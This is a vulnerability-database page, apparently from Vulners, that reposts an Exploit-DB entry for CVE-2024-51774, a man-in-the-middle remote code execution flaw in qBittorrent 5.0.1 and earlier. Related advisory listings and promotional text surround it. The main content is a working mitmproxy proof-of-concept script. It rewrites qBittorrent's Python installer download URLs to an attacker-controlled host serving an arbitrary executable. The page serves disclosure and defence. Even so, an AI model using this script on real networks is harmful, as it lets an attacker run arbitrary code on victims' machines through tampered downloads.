Lucene search
K

qBittorrent 5.0.1 - MITM RCE

🗓️ 11 Apr 2025 00:00:00Reported by Jordan SharpType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 231 Views

CVE-2024-51774 allows remote code execution via MITM attack on qBittorrent 5.0.1 and earlier.

Related
Code
ReporterTitlePublishedViews
Family
AlpineLinux
CVE-2024-51774
2 Nov 202400:00
alpinelinux
Circl
CVE-2024-51774
2 Nov 202408:04
circl
CNNVD
qBittorrent 安全漏洞
2 Nov 202400:00
cnnvd
CVE
CVE-2024-51774
2 Nov 202400:00
cve
Cvelist
CVE-2024-51774
2 Nov 202400:00
cvelist
Debian CVE
CVE-2024-51774
2 Nov 202400:00
debiancve
Fedora
[SECURITY] Fedora 41 Update: qbittorrent-5.0.2-1.fc41
27 Nov 202402:19
fedora
Fedora
[SECURITY] Fedora 40 Update: qbittorrent-5.0.2-1.fc40
1 Dec 202403:38
fedora
Tenable Nessus
Fedora 41 : qbittorrent (2024-1c74fc369b)
27 Nov 202400:00
nessus
Tenable Nessus
Fedora 40 : qbittorrent (2024-ab5ad835c1)
1 Dec 202400:00
nessus
Rows per page
# Exploit Title: qBittorrent 5.0.1 MITM RCE
# Date: 01/02/2025
# Exploit Author: Jordan Sharp
# Vendor Homepage: https://github.com/qbittorrent/qBittorrent
# Software Link: https://www.qbittorrent.org/download
# Version: < 5.0.1
# Tested on: Windows 10
# CVE : CVE-2024-51774

Run the PoC on a MITM machine intercepting the host

"""PoC exploit for CVE-2024-51774"""
from mitmproxy import http

targets = [
    "https://www.python.org/ftp/python/3.10.11/python-3.10.11-amd64.exe",
    "https://www.python.org/ftp/python/3.8.10/python-3.8.10-amd64.exe",
    "https://www.python.org/ftp/python/3.10.11/python-3.10.11.exe",
    "https://www.python.org/ftp/python/3.8.10/python-3.8.10.exe",
    "https://www.python.org/ftp/python/3.4.3/python-3.4.3.msi",
    "https://www.python.org/ftp/python/3.8.5/python-3.8.5-amd64.exe",
    "https://www.python.org/ftp/python/3.8.5/python-3.8.5.exe",
    "https://www.python.org/ftp/python/3.8.1/python-3.8.1-amd64.exe",
    "https://www.python.org/ftp/python/3.8.1/python-3.8.1.exe",
    "https://www.python.org/ftp/python/3.7.4/python-3.7.4-amd64.exe",
    "https://www.python.org/ftp/python/3.7.4/python-3.7.4.exe",
    "https://www.python.org/ftp/python/3.6.6/python-3.6.6.exe",
    "https://www.python.org/ftp/python/3.12.4/python-3.12.4-amd64.exe",
    "https://www.python.org/ftp/python/3.4.4/python-3.4.4.msi",
    "https://www.python.org/ftp/python/3.5.2/python-3.5.2.exe"
]

SUBSTITUTE_URL = "http://192.168.50.2:6666/calc.exe"

def request(flow: http.HTTPFlow) -> None:
    """
    Inject any exe instead of a Python installer.
    """
    if flow.request.pretty_url in targets:
        flow.request.url = SUBSTITUTE_URL

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Apr 2025 00:00Current
7High risk
Vulners AI Score7
CVSS 3.18.1
EPSS0.03935
SSVC
231